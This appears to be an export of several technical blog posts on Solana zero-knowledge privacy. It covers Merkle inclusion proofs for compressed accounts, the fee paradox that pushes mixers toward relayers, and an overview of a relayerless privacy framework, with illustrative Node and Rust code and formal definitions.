classDef cell fill:#0a0a0a,stroke:#4ade80,color:#4ade80
classDef chain fill:#1a1a1a,stroke:#737373,color:#a3a3a3
class A,AD,AO,AL,ADH,AAH cell
class H,L,R,SA chain`}/>

The on-chain footprint is the root (32 bytes) plus the rolling-hash update buffer (a few KB amortised across many writes). The account data, the discriminator, the owner, the lamports — none of that lives in account state. It lives in the indexer's Postgres or in a Photon RPC node, and it's reconstructed at proof-construction time. The inclusion proof is the trick that makes this work. To execute against a compressed account, the client constructs an inclusion proof against a recent root, the on-chain program verifies the proof against the root it has stored, and the program operates on the (now-trusted) account contents. The root is the only piece of state that has to live on chain. Everything else is reconstruction. Compressed accounts are stored as leaves in append-only Merkle trees, with only the tree's root maintained in Solana account state.
State validity is enforced through inclusion proofs verified by the on-chain program at execution time, allowing arbitrary amounts of state to be referenced at constant on-chain storage cost. The reason this is *the* primitive for production privacy on Solana is that Solana's account-state cost is the load-bearing constraint. A normal Solana account is rent-exempt at roughly 0.002 SOL per kilobyte, meaning a megabyte of state costs ~2 SOL ($300+ at 2026 prices). A compressed account is storage-amortised across the tree, and the cost per leaf is sub-cent. Five orders of magnitude.

## The Node simulator

Here is a working Merkle inclusion-proof construction over a 16-leaf tree, with the prover-side path construction and the verifier-side root check. It uses SHA-256 for readability — a real ZERA tree uses Poseidon — but the algorithmic shape is identical.

<Sandbox template="node" files={{ "/index.js": `const { createHash } = require("crypto");

const H = (left, right) =>
  createHash("sha256").update(Buffer.concat([left, right])).digest();

function buildTree(leaves) {
  // Pad to power of two with zero-leaves (Light Protocol does this with a
  // canonical default-leaf hash, so empty subtrees have known roots).
  const padTo = 1 << Math.ceil(Math.log2(Math.max(leaves.length, 1)));
  const padded = leaves.slice();
  while (padded.length < padTo) padded.push(Buffer.alloc(32));
  // Bottom-up construction.
  const levels = [padded];
  while (levels[levels.length - 1].length > 1) {
    const cur = levels[levels.length - 1];
    const next = [];
    for (let i = 0; i < cur.length; i += 2) {
      next.push(H(cur[i], cur[i + 1]));
    }
    levels.push(next);
  }
  return { root: levels[levels.length - 1][0], levels };
}

function inclusionProof(levels, index) {
  const path = [];
  const directions = [];
  let idx = index;
  for (let lvl = 0; lvl < levels.length - 1; lvl++) {
    const sibling = idx % 2 === 0 ? levels[lvl][idx + 1] : levels[lvl][idx - 1];
    path.push(sibling);
    directions.push(idx % 2); // 0 = we are left, 1 = we are right
    idx = idx >> 1;
  }
  return { path, directions };
}

function verifyInclusion(leaf, index, path, root) {
  let cur = leaf;
  let idx = index;
  for (const sibling of path) {
    cur = idx % 2 === 0 ? H(cur, sibling) : H(sibling, cur);
    idx = idx >> 1;
  }
  return cur.equals(root);
}

// Demo ---------------------------------------------------------
function leafFor(i) {
  // In a real shielded pool: leaf = Poseidon(amount, asset, secret, ...)
  // Here: a synthetic leaf so we can read the demo output.
  return createHash("sha256").update(Buffer.from(\`commitment-\${i}\`)).digest();
}

const N = 16;
const leaves = Array.from({ length: N }, (_, i) => leafFor(i));
const { root, levels } = buildTree(leaves);
console.log(\`tree height: \${levels.length - 1}\`);
console.log(\`leaf count: \${N}\`);
console.log(\`root: \${root.toString("hex").slice(0, 24)}...\`);
console.log("");

// Prove inclusion of leaf 7
const idx = 7;
const { path, directions } = inclusionProof(levels, idx);
const ok = verifyInclusion(leaves[idx], idx, path, root);
console.log(\`proving inclusion of leaf \${idx}\`);
console.log(\`co-path length: \${path.length}\`);
console.log(\`directions: [\${directions.join(", ")}]\`);
console.log(\`verifies: \${ok}\`);
console.log("");

// Tampering: try to claim leaf 7 = leaves[3] (a different commitment)
const fake = verifyInclusion(leaves[3], idx, path, root);
console.log(\`tampered claim verifies: \${fake} (expected false)\`);

// Proof size in bytes
const proofBytes = path.reduce((s, p) => s + p.length, 0) + 4; // +4 for index
console.log("");
console.log(\`inclusion proof size: \${proofBytes} bytes\`);
console.log(\`(at h=26 it would be \${26 * 32 + 4} bytes)\`);
`, "/package.json": `{ "name": "merkle-demo", "version": "1.0.0", "main": "index.js" }`, }} />

Two things to notice when you run this.
The proof is *132 bytes* for a 16-leaf tree (4 hashes + an index). Scaled to $h = 26$, it's 836 bytes — independent of how many leaves are in the tree. That's the $O(\log n)$ argument with the constant factor pinned down. The other thing: the tampering attempt at the end fails because `verifyInclusion(leaves[3], 7, path, root)` re-hashes up the wrong path. The directions array is what makes this work; without it, the verifier doesn't know whether the sibling goes on the left or the right.

## Batched inclusion via Merkle Mountain Ranges

The basic Merkle tree is append-only but expensive to grow — every new leaf forces a recompute of $\log_2 N$ internal nodes. For workloads that batch many leaves at once (rollups, periodic deposit windows, settlement layers), the **Merkle Mountain Range** is the structural improvement. An MMR is a forest of perfect binary trees. New leaves are appended to the rightmost tree; when two trees of equal height exist, they're merged. The peaks (one per tree) are then "bagged" — hashed together — to produce the MMR root. The math: $$ |\text{peaks}| = \text{popcount}(N) $$ so for $N = 2^k$ there's exactly one peak, and for $N$ between powers of two the peak count is bounded by $\lceil \log_2 N \rceil$. An inclusion proof for a leaf in an MMR is the path within its containing perfect tree (size $\le \log_2 N$), plus the peaks of the other trees (size $< \log_2 N$). Total: $$ |\pi_{\text{MMR}}| \le 2 \log_2 N \cdot s $$ with $s$ the hash output size. Slightly larger than a balanced tree, but the append is amortised $O(1)$ hashes per leaf (worst case $O(\log N)$ when a run of equal-height trees cascades into merges), which matters for high-throughput deposit workloads. [Todd's original spec](https://github.com/opentimestamps/opentimestamps-server/blob/master/doc/merkle-mountain-range.md) and [Robinson's optimality result (2025)](https://eprint.iacr.org/2025/234) are the references; FlyClient and Mina use MMRs in production.
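The popcount identity is easy to sanity-check. A throwaway Node sketch of my own (not zeraswap code) that tracks only the heights of the perfect trees in the forest:

```javascript
// Track only the heights of the perfect trees in the forest. Appending a leaf
// pushes a height-0 tree, then merges while the two rightmost heights match.
function appendLeaf(peakHeights) {
  peakHeights.push(0);
  while (
    peakHeights.length >= 2 &&
    peakHeights[peakHeights.length - 1] === peakHeights[peakHeights.length - 2]
  ) {
    const h = peakHeights.pop();
    peakHeights[peakHeights.length - 1] = h + 1; // two h-trees become one (h+1)-tree
  }
}

// popcount via the binary string: count the 1 bits of N.
const popcount = (n) => n.toString(2).split("1").length - 1;

const peaks = [];
for (let N = 1; N <= 100; N++) {
  appendLeaf(peaks);
  if (peaks.length !== popcount(N)) throw new Error(`mismatch at N=${N}`);
}
console.log(peaks.length, popcount(100)); // 3 3
```

At every $N$ from 1 to 100 the forest has exactly $\text{popcount}(N)$ peaks; at $N = 100$ (binary `1100100`) that's three trees of heights 6, 5, and 2.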
For [zeraswap](/blog/zeraswap_compressed_amm/) we don't use an MMR — the deposit cadence is interactive enough that the balanced tree dominates — but the design seam is in `programs/zeraswap/src/state.rs` so we can swap if/when the deposit pattern shifts. ## What the on-chain program checks The on-chain inclusion check is two operations: 1. Recompute the root from the leaf, the index, and the co-path. This is $\log_2 N$ Poseidon hashes. On Solana with the `sol_poseidon` syscall, that's roughly $26 \times 1500 = 39{,}000$ compute units at $h = 26$. 2. Compare the recomputed root against a recent canonical root stored on-chain. Light Protocol keeps a sliding window of recent roots (the rolling-hash update buffer) so that proofs constructed against a root from 5-10 slots ago still verify. This is what makes high-throughput compressed accounts work — you can't force every prover to re-derive a proof on every slot tick. The on-chain program does not store the leaves. It does not store the inner nodes. It stores the root and the change history, period. The state-cost difference between "32 bytes on chain plus an indexer" and "32 KB per account" is the entire reason ZK Compression got to mainnet on Solana. ## What lives where, in the ZERA stack To make this concrete: ``` crates/zera-sdk-core/src/merkle.rs # Rust prover-side path construction crates/zera-sdk-onchain/src/lib.rs # on-chain root verification packages/sdk/src/merkle.ts # JS path construction (browser wallet) programs/zeraswap/src/state.rs # commitment-tree state account layout ``` All four read the same Poseidon parameters (see [the Pedersen post](/blog/pedersen_commitments_in_production/) for why we have four implementations of Poseidon and how they're cross-validated). 
The same way the Poseidon hash has to agree byte-for-byte across the four implementations, the Merkle tree construction has to agree on: - Leaf encoding (which fields go into the leaf hash, in what order) - Internal node encoding (left || right, both 32 bytes, big-endian) - Default-leaf hash for empty subtrees (Light Protocol uses Poseidon of zero; we match) - Root format (single 32-byte field element) If any of these drift, the prover and verifier disagree silently and the protocol stops accepting proofs. We have integration tests in `tests/merkle_cross_impl.rs` that build the same tree from the JS and Rust sides and assert equality at every level. They run in CI on every commit. ## Where this leaves the design space The thing I keep coming back to: a Merkle tree is the cheapest possible primitive for "prove this thing is in this set" with a logarithmic-size proof. There is no clever lattice, no exotic accumulator, that comes close on the cost-per-byte budget Solana imposes. Verkle trees are interesting on paper and impractical in production for this surface (the polynomial commitment overhead dominates at the leaf counts we care about). KZG-based vector commitments are interesting for trusted-setup-tolerant rollups and overkill for a privacy pool. So the answer is the boring one. A balanced binary Merkle tree, height 26, Poseidon hash, default-zero subtrees, sliding window of 32 recent roots. It is what Light Protocol shipped, what [zera-sdk](/blog/zera_sdk_scaffolding/) ships, and what every serious Solana privacy stack will ship through the rest of the decade. The interesting work is in the layers above (the SNARK that uses the inclusion proof, the nullifier set that enforces single-spend, the curve choice underneath the hash) — see [the curve post](/blog/why_bn254_and_when_to_switch/) for that. ## Further reading - [ZK Compression Whitepaper](https://www.zkcompression.com/references/whitepaper) — Light Protocol, 2024 — the canonical compressed-account spec. 
- [Merkle Mountain Ranges are optimal](https://eprint.iacr.org/2025/234) — Robinson (2025) — proves the MMR is space-optimal among append-only authenticated dictionaries. - [Light Protocol account-compression program](https://github.com/Lightprotocol/light-protocol/tree/main/programs/account-compression) — the on-chain implementation. - [`Dax911/z_trade/programs/zeraswap`](https://github.com/Dax911/z_trade/tree/main/programs/zeraswap) — production Rust shape for the compressed-AMM use case. - [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — what we hash into the leaves. - [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/) — the dual structure that prevents double-spends. - [zeraswap: a compressed AMM](/blog/zeraswap_compressed_amm/) — sister piece on the trading layer that lives on top of these trees. --- # The fee paradox: why every smart-contract privacy mixer needs a relayer Canonical: https://blog.skill-issue.dev/blog/the_fee_paradox/ Description: On account-model chains the very act of paying a transaction fee deanonymises the recipient. This post formalises the paradox, walks through three resolutions, and sets up the SPST construction that resolves it inside the ZK proof itself. Published: 2026-04-28T16:00:00.000Z Tags: zk, cryptography, privacy, tornado-cash, railgun, pedersen, phd import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx"; The first time I read the Tornado Cash whitepaper I missed the fee paragraph. I noticed the Merkle inclusion, the nullifier hash, the snarkjs circuit. I did not notice the part where, *to actually withdraw to a fresh address*, you need somebody else to broadcast the transaction. It was buried under "operator/relayer" — a word I generously read as "convenience". It is not a convenience. It is the load-bearing wall of every smart-contract privacy mixer in production. 
This post is post 2 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. [Post 1](/blog/relayerless_privacy_intro/) introduced the framework $\mathcal{F}_{\text{RP}}$ and outlined what the rest of the series builds. Here we slow down on the fee paradox itself — what it is, why every system using fees in a public token suffers it, and the three approaches that resolve it. ## Definition: the fee paradox On any blockchain $\mathcal{B}$ with a fee-based inclusion mechanism: 1. To submit a transaction, the submitter's address must pay a gas fee $f > 0$. 2. To hold gas, the address must have been previously funded. 3. Funding an address creates an on-chain link to the funding source. Therefore, **any address that submits a transaction has a traceable funding history**. Any privacy-preserving withdrawal to a fresh (unfunded) address requires an external party to pay the gas fee. Formally, in the **fee paradox game**: 1. User $\mathcal{U}$ deposits value $v$ into a shielded pool. 2. $\mathcal{U}$ wishes to withdraw to a fresh $\mathsf{addr}_{\mathsf{recv}}$ with no prior on-chain history. 3. Adversary $\mathcal{A}$ observes all transactions. 4. If $\mathcal{U}$ funds $\mathsf{addr}_{\mathsf{recv}}$ to pay gas, $\mathcal{A}$ traces the funding source. 5. $\mathcal{A}$ wins by linking the withdrawal to a prior deposit with non-negligible advantage. $$ \mathsf{Adv}^{\mathsf{FeeParadox}}_{\mathcal{A}}(\lambda) \;\geq\; 1 - \mathsf{negl}(\lambda) \quad \text{in standard blockchain models.} $$ The advantage is overwhelming. The deck is stacked because the chain literally requires an attestation from a funded account before it will include any state transition. Privacy at the cryptographic layer collides with funding at the consensus layer, and the consensus layer wins. ## Why UTXO chains don't have this problem Bitcoin and Zcash inherit a different model. 
A UTXO transaction's "fee" is the difference between input value and output value: $$ f \;=\; \sum_i v^{\mathrm{in}}_i \;-\; \sum_j v^{\mathrm{out}}_j. $$ The miner takes $f$ as the implicit fee. There is no separate "gas account" that needs to exist beforehand. In Zcash specifically, a Sapling or Orchard transaction's `valueBalance` field — the net flow from the shielded pool to the transparent pool — *is* the fee. The binding signature proves the value commitment balance. The miner is paid out of value the prover is already moving, signed by the prover, with the prover's identity hidden by the ZK proof. Result: **Zcash is relayer-free by construction**. Penumbra, Aleo, Namada, and Monero are too — for the same reason. They all run on chains whose native fee model is fee-from-balance, not gas-from-account. The fee paradox is specific to **account-model chains** like Ethereum and Solana, where transactions require an explicit fee payer signature and the fee is debited from a known account. ## Three approaches to resolution The paper section §2.3 enumerates three approaches to resolving the paradox without a relayer: ### Approach A — Protocol-Native Fee Abstraction via ZK Fee Proofs The fee is extracted from the shielded pool *inside the ZK proof itself*. The proof attests that $$ \sum_{i=1}^{n_{\mathsf{in}}} v_i \;=\; \sum_{j=1}^{n_{\mathsf{out}}} v'_j \;+\; f $$ where $f$ is a public input to the proof and $v_i, v'_j$ are private inputs. Pedersen commitments make this clean: with $C_i = v_i \cdot G + r_i \cdot H$ for input notes and $C'_j = v'_j \cdot G + r'_j \cdot H$ for output notes, $$ \sum_i C_i \;=\; \sum_j C'_j \;+\; f \cdot G \;+\; r_\Delta \cdot H, $$ where $r_\Delta = \sum_i r_i - \sum_j r'_j$ is a blinding-factor residual that the prover demonstrates equals the right thing. The validator extracts $f$ as inclusion compensation directly. The submitter does not need a public balance. This is what SPST does, and it's the path the whole series builds toward. 
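The balance equation is worth seeing execute. A toy sketch of my own in a multiplicative group — commitments become $g^v h^r \bmod p$, so the sums above turn into products. This illustrates only the algebra; it has none of the hiding or binding guarantees of Pedersen over BN254:

```javascript
// Toy Pedersen in Z_p^*: C(v, r) = g^v * h^r mod p. The additive relation
//   sum C_i = sum C'_j + f*G + rDelta*H
// from the text becomes multiplicative here:
//   prod C_i == prod C'_j * g^f * h^rDelta,  rDelta = sum r_i - sum r'_j.
const p = 2n ** 127n - 1n; // a Mersenne prime; fine for arithmetic, not for security
const g = 5n;
const h = 7n;

const modpow = (b, e, m) => {
  let r = 1n;
  b %= m;
  for (; e > 0n; e >>= 1n, b = (b * b) % m) if (e & 1n) r = (r * b) % m;
  return r;
};
const commit = (v, r) => (modpow(g, v, p) * modpow(h, r, p)) % p;

// Two input notes and one output note, with fee f: 30 + 25 = 50 + 5.
const ins = [{ v: 30n, r: 111n }, { v: 25n, r: 222n }];
const outs = [{ v: 50n, r: 99n }];
const f = 5n;

const lhs = ins.reduce((acc, n) => (acc * commit(n.v, n.r)) % p, 1n);
const rDelta = ins.reduce((s, n) => s + n.r, 0n) - outs.reduce((s, n) => s + n.r, 0n);
const rhs =
  (((outs.reduce((acc, n) => (acc * commit(n.v, n.r)) % p, 1n) * modpow(g, f, p)) % p) *
    modpow(h, rDelta, p)) % p;

console.log(lhs === rhs); // true: the values balance, so the commitments balance

// Claiming one extra unit of fee multiplies the right side by g and breaks it.
const rhsBad = (rhs * g) % p;
console.log(lhs === rhsBad); // false
```

The point of the exercise: the validator never sees $v_i$ or $v'_j$, only the commitments and the public $f$, yet the equation pins the fee to the hidden values.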
### Approach B — Nullifier-Derived Fee Authorization A second derivation from the spending key, parallel to the nullifier: $$ \mathsf{nullifier} = \mathsf{PRF}_k(\rho), \qquad \mathsf{fee\_auth} = \mathsf{PRF}_k(\rho \,\|\, \text{``fee''} \,\|\, f). $$ The ZK proof proves both come from the same $(k, \rho)$, that $\mathsf{fee\_auth}$ encodes $f$, and that the underlying note has sufficient balance. The fee is bound to the nullifier cryptographically — no party can alter the fee post-proof-generation. This is more invasive than Approach A (changes the nullifier scheme) but gives a stronger non-malleability property. Most production designs use Approach A; Approach B becomes interesting when the protocol wants stricter binding for compliance audits. ### Approach C — Recursive Fee Amortization via Batch Proofs For high-frequency private transactions, fold $n$ proofs into a single Nova-style accumulator: $$ \mathsf{FoldedProof}_n \;=\; \mathsf{Fold}(\mathsf{FoldedProof}_{n-1}, \, (\mathsf{tx}_n, w_n)). $$ The folded proof attests that all $n$ transactions are individually valid and that the cumulative fee $F_n = \sum_{k=1}^n f_k$ has been correctly accumulated. A single on-chain verification covers all $n$ transactions. On Solana, with ~200,000 CU per Groth16 verification and a per-transaction limit of ~1,400,000 CU, batches of $n \leq 7$ fit within a single transaction's compute budget. The amortised per-transaction CU cost drops by an order of magnitude.

### Tradeoff summary

| | A — ZK fee proofs | B — Nullifier-derived fee auth | C — Recursive amortization |
|---|---|---|---|
| Fee source | Shielded pool, $f$ a public input | Shielded note, bound via $\mathsf{fee\_auth}$ | Cumulative $F_n$ across a folded batch |
| Circuit impact | Balance equation only | Changes the nullifier scheme | Requires a folding scheme (Nova-style) |
| Fee binding | Bound by the proof | Bound to the nullifier (strongest) | Accumulated per folded step |
| Best fit | The default; what SPST uses | Stricter binding for compliance audits | High-frequency batches ($n \leq 7$ per Solana tx) |

## What the relayer-dependent protocols do instead

Tornado Cash, RAILGUN, and Light Protocol's older privacy phase all chose **none of the above**. They use a relayer who pays the gas in the host chain's native asset, takes a fee from the withdrawn amount, and broadcasts the transaction.
The architecture is roughly:

<Mermaid chart={`graph TD
U[User] -->|"1- Build ZK proof locally"| U
U -->|"2- Send proof + nullifier + recipient + fee"| R[Relayer]
R -->|"3- Pay gas in native asset"| R
R -->|"4- Broadcast withdrawal tx"| P[Privacy Contract]
P -->|"5- Verify proof, check nullifier"| P
P -->|"6- N minus f tokens to recipient"| U
P -->|"7- f tokens fee to relayer"| R
classDef actor stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
class U,R,P actor
`}/>

The proof is binding — the relayer cannot redirect funds, cannot change the fee — but the relayer **can refuse to broadcast**. They can also log the user's IP, timing, and metadata. In RAILGUN this is mitigated by routing over the Waku P2P network; in Tornado Cash it was just an HTTPS endpoint. Either way: the relayer is a third party, and that third party is a regulatory and operational single point of failure.

## What changes when fees are folded into the proof

Once the fee comes from inside the proof, three things become different:

1. **The submitter does not need a balance.** The transaction can be broadcast by the user themselves from a fresh address that has zero of the host chain's native asset. The chain's transaction-broadcasting interface accepts transactions from any party with a valid signature; that signature now binds nothing to the user's identity.
2. **The validator gets paid out of the shielded pool's escrow.** On Solana, this is realised by having the privacy program's PDA hold a lamport reserve. The fee $f$ — proven inside the SPST proof — authorises a transfer from this reserve to the validator. The shielded pool's internal accounting decrements by $f$. Every deposit replenishes the reserve.
3. **Censorship surface collapses.** There is no "approved relayer list" for an adversary to attack. There is no operator to subpoena. The user's only dependency is **chain liveness** — and that's what Solana's PoS consensus guarantees.

This is the Self-Sovereignty Theorem in informal form.
The next post ([SPST](/blog/spst_self_paying_shielded_transactions/)) makes it formal.

## Bibliography

- Pertsev, A., Semenov, R., Storm, R. (2019). *Tornado Cash Privacy Solution v1.4.* https://berkeley-defi.github.io/assets/material/Tornado%20Cash%20Whitepaper.pdf
- RAILGUN Documentation. *Privacy System Architecture.* https://docs.railgun.org
- Hopwood, D. et al. (2016–2026). *Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Pedersen, T. P. (1991). *Non-Interactive and Information-Theoretic Secure Verifiable Secret Sharing.* CRYPTO 1991.
- Kothapalli, A., Setty, S., Tzialla, I. (2022). *Nova: Recursive Zero-Knowledge Arguments from Folding Schemes.* https://eprint.iacr.org/2021/370

Previous: [Series intro ←](/blog/relayerless_privacy_intro/) · Next: [SPST: self-paying shielded transactions →](/blog/spst_self_paying_shielded_transactions/)

---

# Relayerless privacy on a Turing-complete L1: an intro to F_RP

Canonical: https://blog.skill-issue.dev/blog/relayerless_privacy_intro/
Description: A series-opening map of the relayerless full-privacy framework I've been writing up. Five cryptographic games, four constructions (SPST, PPST, TAB, UPEE), one main theorem — and why it matters that the target chain is Solana.
Published: 2026-04-26T15:00:00.000Z
Tags: zk, cryptography, privacy, solana, vanta, research, phd

import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

I've been writing a paper. Working title: *Relayerless Full-Privacy Framework for Turing-Complete Blockchain Systems*. I keep calling it $\mathcal{F}_{\text{RP}}$ in my notebook, and I'll keep doing that here. The shape of it is a quintuple of protocols — $\mathsf{Setup}$, $\mathsf{Shield}$, $\mathsf{Transfer}$, $\mathsf{Unshield}$, $\mathsf{Execute}$ — that together aim to do something every existing privacy system on a smart-contract chain refuses to do: **let the user finish a private transaction without paying anyone but a validator**.
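As a type-level sketch, the quintuple might look like the following. The operation names come from the paper; every signature, field, and the toy pool logic are my invention, not the real construction ($\mathsf{Setup}$ and $\mathsf{Execute}$ are omitted since they don't move value).

```rust
// Illustrative sketch: value flow through a shielded pool under the
// F_RP operation names. Real SPST notes are commitments, not integers.
#[derive(Debug)]
enum Op {
    Shield { amount: u64 },             // move public funds into the pool
    Transfer { amount: u64 },           // private transfer inside the pool
    Unshield { amount: u64, fee: u64 }, // exit; fee paid from inside the proof
}

struct Pool {
    shielded_total: u64, // aggregate value committed in the pool
}

impl Pool {
    fn apply(&mut self, op: Op) -> Result<(), &'static str> {
        match op {
            Op::Shield { amount } => {
                self.shielded_total += amount;
                Ok(())
            }
            // Transfers conserve value inside the pool.
            Op::Transfer { .. } => Ok(()),
            Op::Unshield { amount, fee } => {
                // The fee comes out of the note, not an external gas payer.
                let debit = amount + fee;
                if debit > self.shielded_total {
                    return Err("insufficient pool value");
                }
                self.shielded_total -= debit;
                Ok(())
            }
        }
    }
}

fn main() {
    let mut pool = Pool { shielded_total: 0 };
    pool.apply(Op::Shield { amount: 1_000 }).unwrap();
    pool.apply(Op::Transfer { amount: 400 }).unwrap();
    pool.apply(Op::Unshield { amount: 900, fee: 5 }).unwrap();
    assert_eq!(pool.shielded_total, 95);
}
```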
This post is the orientation. Subsequent posts in the series step through each construction in detail with proofs, circuit costs, and Solana instantiation numbers. Here I want to set the table — what problem $\mathcal{F}_{\text{RP}}$ targets, what games formalise it, and how the four pieces compose.

## The relayer problem, in one paragraph

Submit a private withdrawal on Tornado Cash from a fresh address. The contract verifies the proof, accepts it, and tries to send 1 ETH to your fresh address. Except the *fresh* address has zero ETH and cannot pay gas. So you can't *be* the submitter — somebody else has to broadcast the transaction with their own ETH and bill you for it. That somebody is the **relayer**. The relayer breaks the on-chain link between your deposit and your withdrawal address, but in exchange they observe everything: your IP, your timing, the recipient address, the fee you accept, and which proof maps to which deposit. They are also a **single regulatory point of failure**, as everyone in the West learned in August 2022 when [OFAC sanctioned Tornado Cash](https://www.mayerbrown.com/en/insights/publications/2024/12/federal-appeals-court-tosses-ofac-sanctions-on-tornado-cash) and the registered relayers stopped operating. The user funds were not seized — they were merely *unspendable* because the relayer infrastructure went dark.

Zcash, Penumbra, and Aleo don't need relayers because they are their own chains. Aztec doesn't need relayers because it is its own L2 with its own sequencer. Tornado Cash, RAILGUN, and Light Protocol's older privacy phase need relayers because they are smart-contract layers on a host chain whose fees must be paid in the host chain's native asset by an address that already has it.
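The contrast between the two fee models can be made concrete with a toy comparison. Everything here is mine for illustration: the struct, the fields, and the framing; the point is that the recipient nets $N - f$ either way, and only the trust surface differs.

```rust
// Who pays, and who learns, under the two fee models.
struct Outcome {
    recipient_gets: u64,
    third_party_sees_metadata: bool, // IP, timing, recipient, fee, proof↔deposit
}

// Relayer model: relayer fronts the gas, takes fee f from the note of
// value n, and observes the withdrawal metadata in the process.
fn relayer_withdraw(n: u64, f: u64) -> Outcome {
    Outcome { recipient_gets: n - f, third_party_sees_metadata: true }
}

// Self-paying model (F_RP): the fee is proven inside the ZK proof and
// paid from the shielded pool, so no third party is in the loop at all.
fn self_paying_withdraw(n: u64, f: u64) -> Outcome {
    Outcome { recipient_gets: n - f, third_party_sees_metadata: false }
}

fn main() {
    let r = relayer_withdraw(100, 3);
    let s = self_paying_withdraw(100, 3);
    // Same payout either way...
    assert_eq!(r.recipient_gets, s.recipient_gets);
    // ...but only one model leaks metadata to a third party.
    assert!(r.third_party_sees_metadata && !s.third_party_sees_metadata);
}
```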
What I want — and what $\mathcal{F}_{\text{RP}}$ delivers — is a privacy protocol that runs as a smart-contract layer on a Turing-complete L1, where the only thing the protocol needs from the outside world is **liveness**: the chain keeps making blocks, and any valid transaction eventually gets included.

## Five games that pin down "relayer dependence"

Section 1 of the paper formalises five distinct failure modes that emerge from relayer dependence. Every one of them is an active threat against currently deployed protocols. I'll quote them tersely; the full game definitions are in the paper. The point of formalising these as games is the same point Goldwasser, Micali, and Rackoff made about zero-knowledge proofs in 1985: until you've written down what an adversary can do and how it wins, you have no theorem to prove. These five games are what every honest analysis of a privacy protocol owes the reader.

## What we want, formally

$\mathcal{F}_{\text{RP}} = (\mathsf{Setup}, \mathsf{Shield}, \mathsf{Transfer}, \mathsf{Unshield}, \mathsf{Execute})$ — five protocols, each a PPT algorithm, with the following five desiderata:

**D1 (Full Privacy).** For any PPT adversary with full view of chain state $\sigma$ and any two valid transactions $\mathsf{tx}_0, \mathsf{tx}_1$ (different senders / recipients / amounts / programs):

$$
\mathsf{Adv}^{\mathsf{priv}}_{\mathcal{A}}(\lambda) \;=\; \bigl|\,\Pr[\mathcal{A}(\sigma, \mathsf{tx}_0) = 1] - \Pr[\mathcal{A}(\sigma, \mathsf{tx}_1) = 1]\,\bigr| \;\leq\; \mathsf{negl}(\lambda).
$$

**D2 (Self-Sovereignty).** For every protocol operation $\mathsf{Op}$ and any adversary controlling all network participants except the user $\mathcal{U}$, $\mathcal{U}$ still completes $\mathsf{Op}$ with overwhelming probability — assuming only that the underlying chain $\mathcal{B}$ provides liveness.

**D3 (Composability).** Private state transitions can invoke arbitrary smart contract logic.
For any arithmetic circuit $C: \mathbb{F}^n \to \mathbb{F}^m$ with $|C|$ gates, the framework supports $\mathsf{Execute}(\mathsf{pp}, C, \cdot, \cdot)$ with proof generation cost polynomial in $|C|$.

**D4 (Succinctness).** On-chain verification cost $O(1)$ pairings or $O(\log n)$ hash evaluations. Proof size $O(1)$ or $O(\log^2 n)$.

**D5 (No / Universal Trusted Setup).** Either no setup (transparent) or a universal SRS that is updatable by any party.

If you've read [the post on Halo2](/blog/halo2_in_2026_what_changed/) you'll recognise D5 as the "no per-circuit ceremony" requirement. D1, D2, D3, D4 are the standard four for a privacy SNARK; D2 is the one the existing relayer-dependent protocols silently violate.

## Four constructions

The framework decomposes into four primitives, each addressing one piece of the problem:

<Mermaid chart={`graph TD
  A[SPST<br/>Self-Paying Shielded Transactions] --> D[UPEE<br/>Universal Private Execution Environment]
  B[PPST<br/>Private Programmable State Transitions] --> D
  C[TAB<br/>Threshold-Anonymous Broadcast] --> D
  D --> E[Theorem 3.12<br/>Simulation-Based Privacy]
  D --> F[Theorem 3.13<br/>Self-Sovereignty]
  classDef build stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  classDef thm stroke:#facc15,stroke-width:2px,fill:#0a0a0a,color:#fff
  class A,B,C,D build
  class E,F thm
`}/>

1. **SPST — Self-Paying Shielded Transaction.** A note/commitment/nullifier scheme where the fee $f$ is extracted *inside the ZK proof itself* via a Pedersen-commitment balance equation. The fee paradox dies here. ([Post 3](/blog/spst_self_paying_shielded_transactions/).)
2. **PPST — Private Programmable State Transitions.** SPST generalised so that the proof attests to correct execution of an arbitrary arithmetic circuit $C$ over committed pre-state and post-state. This is what makes the framework Turing-complete. ([Post 4](/blog/ppst_private_programmable_state/).)
3. **TAB — Threshold-Anonymous Broadcast.** Network-layer anonymity, using ring signatures (Approach A) or FROST-style threshold Schnorr (Approach B) to hide which of $n$ participants actually submitted the transaction. ([Post 5](/blog/tab_threshold_anonymous_broadcast/).)
4. **UPEE — Universal Private Execution Environment.** The composition: $(\mathsf{Setup}, \mathsf{Deploy}, \mathsf{Invoke}, \mathsf{Verify}, \mathsf{Finalize})$. UPEE is what gets deployed to a chain. ([Post 7](/blog/upee_universal_private_execution/).)

The two main theorems sit on top of the stack:

- **Theorem 3.12 (Simulation-Based Privacy).** For any PPT adversary controlling the blockchain there exists a PPT simulator $\mathcal{S}$ such that $\{\mathsf{View}_{\mathcal{A}}(\mathsf{Real})\} \approx_c \{\mathsf{View}_{\mathcal{A}}(\mathsf{Ideal})\}$, where $\mathcal{S}$ learns only that *some* valid transaction occurred and *some* fee was paid.
- **Theorem 3.13 (Self-Sovereignty).** $\Pr[\mathsf{Game}_{\mathrm{RF}}(\mathcal{A}, \lambda) = 1] \geq 1 - \mathsf{negl}(\lambda)$ for any adversary $\mathcal{A}$ controlling all network participants except the user.
The first theorem is the "this is private" theorem; the second is the "you don't need a relayer" theorem. The series will derive both.

## Why Solana, specifically

I keep being asked why I'm building this on Solana instead of writing yet another L1. The honest answer:

1. The chain already exists, has 65k+ TPS theoretical throughput, and sub-second finality.
2. Native `alt_bn128` syscalls (added in v1.16) make Groth16 verification cost **< 200,000 CU** on-chain — that's roughly $0.02 per private transaction.
3. The 1,232-byte transaction limit is tight but not impossible: SPST fits in **656 bytes**. SIMD-0296 (approved late 2025) raises this to 4,096 bytes.
4. Light Protocol's [ZK Compression](https://www.zkcompression.com/resources/whitepaper) infrastructure already provides Poseidon Merkle trees and Groth16 verification — most of the substrate I need.

The chain doesn't get to lie about what it ran. So make the chain run something that doesn't tell anyone anything.

